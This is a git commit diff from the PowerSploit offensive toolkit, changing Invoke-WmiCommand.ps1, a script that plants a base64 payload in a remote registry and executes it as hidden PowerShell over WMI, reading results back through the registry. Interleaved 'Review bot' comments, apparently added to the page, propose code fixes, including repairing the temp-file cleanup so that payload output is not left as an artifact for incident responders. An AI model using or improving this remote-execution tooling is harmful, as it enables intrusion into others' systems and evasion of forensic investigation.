author | PowerShellMafia <PowerShellMafia@users.noreply.github.com> | 2015-12-18 16:33:59 -0800 |
committer | PowerShellMafia <PowerShellMafia@users.noreply.github.com> | 2015-12-18 16:33:59 -0800 |
commit | 9e771d15bf19ab3c2ac196393c088ecdab6c9a73 (patch) | |
tree | 58927893ecb9289ad1de64d3a67eb58d00e4b762 /CodeExecution/Invoke-WmiCommand.ps1 | |
parent | 9f78286ea7b0ec65d2aa09893a076864dd8d14e9 (diff) | |
parent | 9f183e36518176c4299eed5c68b7deac7f4e8025 (diff) | |
Merge pull request #102 from PowerShellMafia/devv3.0.0
Merge 3.0 release changes
Diffstat (limited to 'CodeExecution/Invoke-WmiCommand.ps1')
-rw-r--r-- | CodeExecution/Invoke-WmiCommand.ps1 | 45 |
1 files changed, 35 insertions, 10 deletions
diff --git a/CodeExecution/Invoke-WmiCommand.ps1 b/CodeExecution/Invoke-WmiCommand.ps1
index 6ee1e15..0c06424 100644
--- a/CodeExecution/Invoke-WmiCommand.ps1
+++ b/CodeExecution/Invoke-WmiCommand.ps1
@@ -1,5 +1,3 @@ -#Requires -Version 2 - function Invoke-WmiCommand { <# .SYNOPSIS
@@ -185,7 +183,7 @@ the output of your payload back. :P [Management.Automation.PSCredential] [Management.Automation.CredentialAttribute()] - $Credential, + $Credential = [Management.Automation.PSCredential]::Empty, [Management.ImpersonationLevel] $Impersonation,
@@ -209,6 +207,8 @@ the output of your payload back. :P 'HKEY_CURRENT_CONFIG' { $Hive = 2147483653 } } + $HKEY_LOCAL_MACHINE = 2147483650 + $WmiMethodArgs = @{} # If additional WMI cmdlet properties were provided, proxy them to Invoke-WmiMethod
@@ -253,6 +253,18 @@ the output of your payload back. :P throw "[$Computer] You do not have permission to perform all the registry operations necessary for Invoke-WmiCommand." } + $PSSettingsPath = 'SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell' + $PSPathValueName = 'Path' + + $Result = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\default' -Class 'StdRegProv' -Name 'GetStringValue' -ArgumentList $HKEY_LOCAL_MACHINE, $PSSettingsPath, $PSPathValueName + + if ($Result.ReturnValue -ne 0) { + throw "[$Computer] Unable to obtain powershell.exe path from the following registry value: HKEY_LOCAL_MACHINE\$PSSettingsPath\$PSPathValueName" + } + + $PowerShellPath = $Result.sValue + Write-Verbose "[$Computer] Full PowerShell path: $PowerShellPath" + $EncodedPayload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($Payload)) Write-Verbose "[$Computer] Storing the payload into the following registry value: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName"
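Review bot: In the hunk at `@@ -253,6 +253,18 @@`, `$PowerShellPath = $Result.sValue` is accepted as soon as `ReturnValue -eq 0`, so a `Path` value that exists but is empty passes this check and the failure only surfaces later at process creation with a less specific message; a guard beside the existing throw, `if ([string]::IsNullOrWhiteSpace($Result.sValue)) { throw "[$Computer] Empty powershell.exe path in HKEY_LOCAL_MACHINE\$PSSettingsPath\$PSPathValueName" }`, keeps the error at its source. The literal `$HKEY_LOCAL_MACHINE = 2147483650` added in the `@@ -209` hunk sits right after a `switch` that appears to map hive names to the same numeric ids (only its `HKEY_CURRENT_CONFIG` arm is visible), so a short comment such as `# StdRegProv hive id for HKLM, used for the powershell.exe path lookup below` would explain why the number is repeated here. Dropping `#Requires -Version 2` in the first hunk is not explained by the commit message; the comment-based help could state the minimum supported PowerShell version in a `.NOTES` entry. `Invoke-WmiCommand` begins before the second hunk and ends after the last one.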
@@ -282,18 +294,25 @@ the output of your payload back. :P if (($Result.ReturnValue -eq 0) -and ($Result.sValue)) { $Payload = [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Result.sValue)) - $SerilizedPayloadResult = Invoke-Expression ($Payload) | % { - [Management.Automation.PSSerializer]::Serialize($_, 4) - } + $TempSerializedResultPath = [IO.Path]::GetTempFileName() + + $PayloadResult = Invoke-Expression ($Payload) + + Export-Clixml -InputObject $PayloadResult -Path $TempSerializedResultPath + + $SerilizedPayloadText = [IO.File]::ReadAllText($TempSerializedResultPath) + + $null = Invoke-WmiMethod @WmiMethodArgs -Name 'SetStringValue' -ArgumentList $Hive, $RegistryKeyPath, $SerilizedPayloadText, $RegistryResultValueName + + Remove-Item -Path $SerilizedPayloadResult -Force - $null = Invoke-WmiMethod @WmiMethodArgs -Name 'SetStringValue' -ArgumentList $Hive, $RegistryKeyPath, $SerilizedPayloadResult, $RegistryResultValueName $null = Invoke-WmiMethod @WmiMethodArgs -Name 'DeleteValue' -ArgumentList $Hive, $RegistryKeyPath, $RegistryPayloadValueName } } $Base64Payload = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($RemotePayloadRunner)) - $Cmdline = "powershell -WindowStyle Hidden -NoProfile -EncodedCommand $Base64Payload" + $Cmdline = "$PowerShellPath -WindowStyle Hidden -NoProfile -EncodedCommand $Base64Payload" # Execute the payload runner on the remote system $Result = Invoke-WmiMethod @WmiMethodArgs -Namespace 'Root\cimv2' -Class 'Win32_Process' -Name 'Create' -ArgumentList $Cmdline 
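Review bot: `Remove-Item -Path $SerilizedPayloadResult -Force` names the variable this hunk removed rather than the new `$TempSerializedResultPath`, so the cleanup cannot succeed and the CLIXML file written by `Export-Clixml` appears to stay behind in the temp directory of the account running the payload on the remote host, holding the payload output in clear text — a durable on-disk artifact that responders can collect. The intended line is evidently `Remove-Item -Path $TempSerializedResultPath -Force`. Separately, `$Cmdline = "$PowerShellPath -WindowStyle Hidden -NoProfile -EncodedCommand $Base64Payload"` interpolates the registry-derived path unquoted, so a value containing spaces would be split at process creation. The first part of this hunk appears to be the body of the `$RemotePayloadRunner` script text (its delimiters are not visible here), and the enclosing `Invoke-WmiCommand` body begins before and ends after the hunk.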
@@ -301,7 +320,7 @@ the output of your payload back. :P Start-Sleep -Seconds 5 if ($Result.ReturnValue -ne 0) { - throw "[$Computer] Unable execute payload stored within the following registry value: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName" + throw "[$Computer] Unable to execute payload stored within the following registry value: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName" } Write-Verbose "[$Computer] Payload successfully executed from: $RegistryHive\$RegistryKeyPath\$RegistryPayloadValueName"
@@ -315,7 +334,13 @@ the output of your payload back. :P Write-Verbose "[$Computer] Payload results successfully retrieved from: $RegistryHive\$RegistryKeyPath\$RegistryResultValueName" $SerilizedPayloadResult = $Result.sValue - $PayloadResult = [Management.Automation.PSSerializer]::Deserialize($SerilizedPayloadResult) + + $TempSerializedResultPath = [IO.Path]::GetTempFileName() + + Out-File -InputObject $SerilizedPayloadResult -FilePath $TempSerializedResultPath + $PayloadResult = Import-Clixml -Path $TempSerializedResultPath + + Remove-Item -Path $TempSerializedResultPath $FinalResult = New-Object PSObject -Property @{ PSComputerName = $Computer |